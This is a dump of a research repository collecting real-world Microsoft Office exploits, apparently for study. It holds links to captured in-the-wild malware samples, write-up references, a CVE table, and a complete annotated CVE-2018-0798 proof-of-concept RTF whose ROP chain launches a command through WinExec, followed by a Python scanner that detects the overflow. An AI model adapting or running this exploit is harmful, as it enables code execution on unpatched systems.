3 | [EPS Processing Zero-Days Exploited by Multiple Threat Actors](https://www.mandiant.com/resources/blog/eps-processing-zero-days)
4 |
5 | [Sednit adds two zero-day exploits using ‘Trump’s attack on Syria’ as a decoy](https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/)
6 |
--------------------------------------------------------------------------------
/CVE-2017-0261&CVE-2017-0262/ef783cc3c4e1e0649b4629f3396cff4c0e0e0e67c07cacb8a9ae7c0cfa16bf0c.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-0261&CVE-2017-0262/ef783cc3c4e1e0649b4629f3396cff4c0e0e0e67c07cacb8a9ae7c0cfa16bf0c.bin.gz
--------------------------------------------------------------------------------
/CVE-2017-11826/README.md:
--------------------------------------------------------------------------------
1 | reference:
2 |
3 |
[CVE-2017-11826 vulnerability analysis, exploitation and dynamic detection](https://www.anquanke.com/post/id/87122)
4 |
5 | [CVE-2017-11826 Exploited in the Wild with Politically Themed RTF Document](https://www.fortinet.com/blog/threat-research/cve-2017-11826-exploited-in-the-wild-with-politically-themed-rtf-document)
6 |
--------------------------------------------------------------------------------
/CVE-2017-11826/aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-11826/aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3.bin.gz
--------------------------------------------------------------------------------
/CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08.bin.gz
--------------------------------------------------------------------------------
/CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/README.md:
--------------------------------------------------------------------------------
1 | CVE-2017-11882, CVE-2018-0802 and CVE-2018-0798 are all stack overflows in EQNEDT32.EXE, so I put them together.
2 |
3 | CVE-2017-11882: stack overflow while parsing a font name
4 |
5 | CVE-2018-0802: stack overflow while parsing a font name
6 |
7 | CVE-2018-0798: stack overflow while parsing a matrix record
8 |
9 | 25a473ec43acfe80182d3fd6cd9cf87ac362a18b78a554bf1dda8d9dc05bee08 [4] exploits both CVE-2017-11882 and CVE-2018-0802.
10 |
11 | **cve-2018-0802 poc with aslr-bypass.rtf and cve-2018-0802 poc with comments.rtf exploit CVE-2018-0798. The so-called CVE-2018-0802 in the Check Point article is actually CVE-2018-0798. Because of a mistake on Microsoft's side, the CVE-2018-0798 bug submitted by Check Point [6] was filed under CVE-2018-0802, which caused extensive discussion among analysts in China and abroad.**
12 |
13 | Microsoft added ASLR and fixed several strcpy calls in the November 2017 patch, but that was clearly not enough, so the January 2018 patch removed the component altogether.
14 |
15 | reference:
16 |
17 | CVE-2017-11882
18 |
19 | 1. [CVE-2017-11882 vulnerability analysis, exploitation and dynamic detection](https://www.anquanke.com/post/id/87311)
20 |
21 | 2. [Proof-of-Concept exploits for CVE-2017-11882](https://github.com/embedi/CVE-2017-11882)
22 |
23 | 3. [Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)](https://blog.0patch.com/2017/11/did-microsoft-just-manually-patch-their.html)
24 |
25 | CVE-2018-0802
26 |
27 | 4. [Analysis of the latest APT campaign by "黑凤梨" (BlackTech)](http://www.freebuf.com/column/159865.html)
28 |
29 | CVE-2018-0798
30 |
31 | 5. [Step-by-step reproduction of the third vulnerability in the Office Equation Editor](https://www.anquanke.com/post/id/94841)
32 |
33 | 6. [Many Formulas, One Calc – Exploiting a New Office Equation Vulnerability](https://research.checkpoint.com/2018/another-office-equation-rce-vulnerability/)
34 |
--------------------------------------------------------------------------------
/CVE-2017-11882&CVE-2018-0802&CVE-2018-0798/cve-2018-0802 poc with comments.rtf:
--------------------------------------------------------------------------------
1 | {\rtf1
2 | { Hello, calculator!
} 3 | {\object \objemb \objupdate \objw1 \objh1 4 | {\*\objclass Equation.3} 5 | {\*\objdata 6 | 01050000 {\*\comment OLE Version } 7 | 02000000 {\*\comment Format ID -> 0x02 = Embedded Object } 8 | 0b000000 {\*\comment ClassName.Length -> 0x0B = 11 } 9 | 4571756174696f6e2e3300 {\*\comment ClassName.String -> "Equation.3\x00" } 10 | 00000000 {\*\comment TopicName.Length -> 0x00 } 11 | 00000000 {\*\comment Item.Length -> 0x00 } 12 | 00140000 {\*\comment NativeData.Size -> 0x1400 = 5120 } 13 | 14 | D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFF060000000700000008000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C000000000000046000000000000000000000000304E4E74DF0AD30103000000C00900000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000004000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F0000001000000011000000120000001300000014000000FEFFFFFF160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F00000020000000210000002200000023000000240000002500000026000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF030000000400000001000000FFFFFFFF00000000000000007349000034060000040400000100090000030202000004001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A005A0421200000026060F001A00FFFFFFFF000010000000C0FFFFFFC0FFFFFF60420000600500000B00000026060F000C004D617468547970650000C00008000000FA0200000800000000000000040000002D010000050000001402F8016000050000001302F801404208000000FA0200001000000000000000040000002D010100050000001402C0034000050002004F006C0065005000720065007300300030003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180002010300000005000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000040000002C040000000000004500710075006100740069006F006E0020004E006100740069007600650000000000000000000000000000000000000000000000000000000000000000
00000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000001500000057040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001302C00360421C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFFE2250A7A00000A0000000000040000002D0102000B000000320A4C05503C0800000031313131313131310C000000320A4C05D0340A000000313131313131313131310C000000320A4C05502D0A000000313131313131313131310C000000320A4C05D0250A000000313131313131313131310C000000320A4C05501E0A000000313131313131313131310C000000320A4C05D0160A000000313131313131313131310C000000320A4C05500F0A000000313131313131313131310C000000320A4C05D0070A000000313131313131313131310C000000320A4C0550000A000000313131313131313131310B000000320A8403503C0800000031313131313131310C000000320A8403D0340A000000313131313131313131310C000000320A8403502D0A000000313131313131313131310C000000320A8403D0250A000000313131313131313131310C000000320A8403501E0A000000313131313131313131310C000000320A8403D0160A000000313131313131313131310C000000320A8403500F0A000000313131313131313131310C000000320A8403D0070A000000313131313131313131310C000000320A840350000A000000313131313131313131310B000000320A6601503C0800000031313131313131310C000000320A6601D0340A000000313131313131313131310C000000320A6601502D0A000000313131313131313131310C000000320A6601D0250A000000313131313131313131310C000000320A6601501E0A000000313131313131313131310C000000320A6601D0160A000000313131313131313131310C000000320A6601500F0A000000313131313131313131310C000000320A6601D0070A
000000313131313131313131310C000000320A660150000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFFD4EF1800040000002D01030004000000F00102000300000000000000000000000000000000000000000000000000
15 |
16 | {\*\comment MTEF Header }
17 | 1C00 {\*\comment MTEF Header Size -> 0x1C = 28 }
18 | 00000200
19 | A8C4
20 | 3B040000
21 |
22 | 00000000
23 | E0A06600
24 | ECE76500
25 | 00000000
26 |
27 | 03 {\*\comment Version }
28 | 01 {\*\comment Generating Platform }
29 | 01 {\*\comment Generating Product }
30 | 03 {\*\comment Product Version }
31 | 0A {\*\comment Product Subversion }
32 |
33 | 0A {\*\comment TYPESIZE Record }
34 | 01
35 |
36 | 05 {\*\comment MATRIX Record }
37 | 01
38 | 01
39 | 01
40 | 1C {\*\comment size1 -> Copy 8 bytes to EBP-0x14 }
41 | 94 {\*\comment size2 -> Copy 38 bytes to EBP-0x0C }
42 |
43 | 636D642E {\*\comment EBP-0x14 -> "cmd." }
44 | 65786520 {\*\comment EBP-0x10 -> "exe " }
45 | 2F632063 {\*\comment EBP-0x0C -> "/c c" }
46 | 616C6300 {\*\comment EBP-0x08 -> "alc\x00" }
47 | 00000000 {\*\comment EBP-0x04 }
48 | 19000000 {\*\comment EBP-0x00: 0x19 = (0x32 / 2) }
49 | 3AC74400 {\*\comment Return Address -> Base + 0x0004C73A } {\*\asmcomment add esp, 4; retn; }
50 |
51 | 285B4500 {\*\comment Writable Address -> Base + 0x00055B28 }
52 | B60E4100 {\*\comment Increase EAX -> Base + 0x00010EB6 } {\*\asmcomment add eax, ebp; retn 2; }
53 | B60E4100 {\*\comment Increase EAX -> Base + 0x00010EB6 } {\*\asmcomment add eax, ebp; retn 2; }
54 | 0000
55 | 4BED4000 {\*\comment Push EAX and Call WinExec -> Base + 0x0000ED4B }
56 |
57 |
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000
58 |
59 | {\*\comment End of the equation }
60 |
61 | 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
62 |
63 | 01050000 {\*\comment OLE Version }
64 | 05000000 {\*\comment Format ID -> 0x05 = Presentation Object with a ClassName }
65 | 0D000000 {\*\comment ClassName.Length -> 0x0D = 13 }
66 | 4D45544146494C455049435400734900 {\*\comment ClassName.String -> "METAFILEPICT\x00" }
67 |
68 | {\*\comment Presentation Data }
69 | …
70 | }
71 | }
72 | }
--------------------------------------------------------------------------------
/CVE-2017-8759/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684.bin.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-8759/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684.bin.gz
--------------------------------------------------------------------------------
/CVE-2017-8759/README.md:
--------------------------------------------------------------------------------
1 | reference:
2 | [FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY](https://www.mandiant.com/resources/blog/zero-day-used-to-distribute-finspy)
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # office-exploit-case-study
2 |
3 | **Update 2024.1: fixed broken links**
4 |
5 | A collection of Office exploits used in the real world in recent years, with samples and write-ups. Please study them in a virtual machine; you alone are responsible if you use them for illegal purposes. Where a write-up mentions a hash, the sample should match it.
6 |
7 | If you are looking for more PoCs (reported by researchers and never used in the real world), search exploit-db for "microsoft office"; many researchers also publish their PoCs, for example at https://srcincite.io/advisories/ and https://bugs.chromium.org/p/project-zero/issues/list.
8 |
9 | What did Microsoft do to make Office more secure?
10 |
11 | 1. Data Execution Prevention in Office 2010
12 |
13 | 2. ASLR enforced natively in Office 2013, without any additional setting, on Windows 7 and above, even for DLLs not originally compiled with the /DYNAMICBASE flag
14 |
15 | 3. EPS disabled in the April 2017 patch
16 |
17 | 4. DDE disabled in the December 2017 patch
18 |
19 | CVE | Vulnerability type | Fix date
20 | ------------------|-----------------------------------------|--------
21 | CVE-2012-0158 | stack overflow in ActiveX | 2012.4
22 | CVE-2012-1856 | use after free in ActiveX | 2012.8
23 | CVE-2013-3906 | out-of-bounds array access in TIFF parser | 2013.12
24 | CVE-2014-1761 | out-of-bounds array access in RTF parser | 2014.4
25 | CVE-2014-4114 | logic flaw in OLE object handling | 2014.10
26 | CVE-2014-6352 (patch bypass of CVE-2014-4114) | logic flaw in OLE object handling | 2014.11
27 | CVE-2015-0097 | logic flaw in security zone handling | 2015.3
28 | CVE-2015-1641 | type confusion in RTF parser | 2015.4
29 | CVE-2015-2545 | use after free in EPS parser | 2015.9
30 | CVE-2016-7193 | out-of-bounds array access in RTF parser | 2016.10
31 | CVE-2017-0199 | logic flaw in Office Moniker handling | 2017.4
32 | CVE-2017-0261 | use after free in EPS parser | 2017.5
33 | CVE-2017-0262 | type confusion in EPS parser | 2017.5
34 | CVE-2017-8570 (patch bypass of CVE-2017-0199) | logic flaw in Office Moniker handling | 2017.7
35 | CVE-2017-8759 | logic flaw in .NET Framework | 2017.9
36 | CVE-2017-11826 | type confusion in OOXML parser | 2017.10
37 | CVE-2017-11882 | stack overflow in EQNEDT32.EXE | 2017.11
38 | CVE-2018-0798 | stack overflow in EQNEDT32.EXE | 2018.1
39 | CVE-2018-0802 | stack overflow in EQNEDT32.EXE | 2018.1
40 |
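The EQNEDT32 README above describes the three Equation Editor CVEs as stack overflows during font-name and matrix-record parsing, and the commented CVE-2018-0798 POC spells out the layers a triage tool has to cross: the OLE1 ObjectHeader in front of the `\objdata` hex, the 28-byte Equation Native header, the 5-byte MTEF header, and the MATRIX record whose rows/cols bytes (0x1C and 0x94) decide how many partition bytes are copied onto the stack. The Python below is an added example, not code from this repository or from any of the referenced write-ups. It extracts the `\objdata` hex the way this POC demands (nested `{\*\comment}` groups and control words dropped, so a plain hex regex is not enough), parses the OLE1 header exactly as the comments document it, finds the Equation Native stream with a byte-scan heuristic instead of a compound-file parser, and walks the MTEF records the POC uses, flagging MATRIX and FONT records whose copies exceed assumed buffer sizes. The record layouts, the 0x24-byte font-name limit, the 8-byte partition limit, the `find_mtef` heuristic and the `build_sample_rtf` input are assumptions made for the example, not values taken from a specification; the `POC_PREFIX` lines are quoted from the POC on this page, reflowed onto fewer lines.

```python
import math
import re
import struct
# Quoted from the commented POC on this page (reflowed): the OLE1 ObjectHeader that
# precedes the \objdata hex, with its {\*\comment ...} groups left in place.
POC_PREFIX = r"""{\*\objdata
01050000 {\*\comment OLE Version } 02000000 {\*\comment Format ID -> 0x02 = Embedded Object }
0b000000 {\*\comment ClassName.Length -> 0x0B = 11 } 4571756174696f6e2e3300 {\*\comment ClassName.String -> "Equation.3\x00" }
00000000 00000000 00140000 {\*\comment NativeData.Size -> 0x1400 = 5120 } }"""

HEX = set("0123456789abcdefABCDEF")
END, MATRIX, FONT, TYPESIZE = 0x00, 0x05, 0x08, 0x0A
# Assumed limits, not spec values: public CVE-2017-11882 write-ups describe a 0x24-byte stack
# buffer for the FONT name; the POC comments show the MATRIX row-partition copy filling 8 bytes.
MAX_FONT_NAME, MAX_PART_BYTES = 0x24, 8

def extract_objdata_hex(rtf: str) -> bytes:
    """Decode the first objdata group, dropping nested groups and control words."""
    start = rtf.index(r"{\*\objdata") + len(r"{\*\objdata")
    depth, i = 1, start
    while depth and i < len(rtf):                # find the matching close brace
        depth += {"{": 1, "}": -1}.get(rtf[i], 0)
        i += 1
    body = rtf[start:i - 1]
    while re.search(r"\{[^{}]*\}", body):        # strip nested {\*\comment ...} groups
        body = re.sub(r"\{[^{}]*\}", "", body)
    body = re.sub(r"\\[A-Za-z]+-?\d*|\\.", "", body)   # strip control words / symbols
    return bytes.fromhex("".join(c for c in body if c in HEX))

def parse_ole1_header(blob: bytes) -> dict:
    """OLE1 ObjectHeader, field order exactly as the POC comments document it."""
    _ole_version, _format_id, cls_len = struct.unpack_from("<III", blob, 0)
    class_name = blob[12:12 + cls_len].rstrip(b"\x00").decode("ascii", "replace")
    off = 12 + cls_len
    topic_len, = struct.unpack_from("<I", blob, off); off += 4 + topic_len
    item_len, = struct.unpack_from("<I", blob, off); off += 4 + item_len
    native_size, = struct.unpack_from("<I", blob, off); off += 4
    return {"class_name": class_name, "native_size": native_size, "native": blob[off:off + native_size]}

def find_mtef(native: bytes):
    """Heuristic: locate the 28-byte Equation Native header (cbHdr=0x1C, version, clipboard
    format, cbObject, 16 reserved bytes) by requiring an MTEF v3 header right behind it,
    instead of parsing the compound file that real samples wrap it in."""
    for off in range(len(native) - 29):
        cb_hdr, _ver, _cf, cb_obj = struct.unpack_from("<HIHI", native, off)
        if cb_hdr == 0x1C and native[off + 28] == 3 and native[off + 29] in (0, 1):
            return native[off + 28:off + 28 + cb_obj]
    return None

def partition_bytes(n: int) -> int:
    """2 bits per partition line for n+1 lines, rounded up: 0x1C -> 8, 0x94 -> 38 (as in the POC)."""
    return math.ceil((n + 1) * 2 / 8)

def walk_mtef(mtef: bytes) -> list:
    """Walk the record types the POC uses (layouts taken from its comments), flag copies
    larger than the assumed stack buffers, and stop at any record type not modelled here."""
    if len(mtef) < 6 or mtef[0] != 3:
        return ["not MTEF v3"]
    findings, off = [], 5                        # skip the 5-byte MTEF header
    while off < len(mtef):
        tag = mtef[off]
        if tag == END:
            break
        if tag == TYPESIZE:                      # 0A xx, as labelled in the POC
            off += 2
        elif tag == MATRIX:                      # 05 ? ? ? rows cols row_parts col_parts
            rows, cols = mtef[off + 4], mtef[off + 5]
            rb, cb = partition_bytes(rows), partition_bytes(cols)
            if max(rb, cb) > MAX_PART_BYTES:
                findings.append(f"MATRIX@{off}: rows={rows} cols={cols} copies {rb}+{cb} bytes (CVE-2018-0798 pattern)")
            off += 6 + rb + cb
        elif tag == FONT:                        # 08 tface style name\0
            end = mtef.index(b"\x00", off + 3)
            if end - off - 3 > MAX_FONT_NAME:
                findings.append(f"FONT@{off}: {end - off - 3}-byte font name (CVE-2017-11882 pattern)")
            off = end + 1
        else:
            findings.append(f"stop: unmodelled record tag 0x{tag:02x} at {off}")
            break
    return findings

def scan_rtf(rtf: str) -> dict:
    """objdata -> OLE1 header -> Equation Native stream -> MTEF records."""
    hdr = parse_ole1_header(extract_objdata_hex(rtf))
    mtef = find_mtef(hdr["native"]) if hdr["class_name"] == "Equation.3" else None
    return {"class_name": hdr["class_name"], "findings": walk_mtef(mtef) if mtef else []}

def build_sample_rtf(rows: int, cols: int, font_name: bytes = b"Times New Roman") -> str:
    """Constructed sample, not a file from this repository: an Equation.3 OLE1 object whose native
    data is a bare Equation Native stream (no compound file), so the scanner runs offline.
    The partition bytes are filler, not the POC's ROP chain."""
    mtef = bytes([3, 1, 1, 3, 0x0A, TYPESIZE, 1, FONT, 1, 0]) + font_name + b"\x00"
    mtef += bytes([MATRIX, 1, 1, 1, rows, cols])
    mtef += b"A" * (partition_bytes(rows) + partition_bytes(cols)) + bytes([END])
    eqn = struct.pack("<HIHI", 0x1C, 0x00020000, 0xC4A8, len(mtef)) + b"\x00" * 16 + mtef
    ole1 = struct.pack("<III", 0x501, 2, 11) + b"Equation.3\x00" + struct.pack("<III", 0, 0, len(eqn)) + eqn
    return ("{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata "
            "{\\*\\comment constructed sample }\n" + ole1.hex() + "}}}")
```

`scan_rtf(build_sample_rtf(0x1C, 0x94))` reproduces the POC's numbers (8 and 38 partition bytes) as a single MATRIX finding, while `build_sample_rtf(2, 2)` passes clean. Against a real sample the `find_mtef` scan can be replaced by reading the `Equation Native` stream out of the compound file with an OLE tool and handing its bytes straight to `walk_mtef`; the walker deliberately stops at record types it does not model rather than guessing their length, which is the right failure mode for a parser that only exists to flag two known overflow patterns.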
-------------------------------------------------------------------------------- /papers/Attacking Interoperability-An OLE Edition.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/papers/Attacking Interoperability-An OLE Edition.pdf -------------------------------------------------------------------------------- /papers/Moniker Magic-Running Scripts Directly in Microsoft Office.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/papers/Moniker Magic-Running Scripts Directly in Microsoft Office.pdf -------------------------------------------------------------------------------- /papers/OLE object are still dangerous today-Exploiting Microsoft Office.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/papers/OLE object are still dangerous today-Exploiting Microsoft Office.pdf -------------------------------------------------------------------------------- /papers/Persisting with Microsoft Office-Abusing Extensibility Options.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/papers/Persisting with Microsoft Office-Abusing Extensibility Options.pdf --------------------------------------------------------------------------------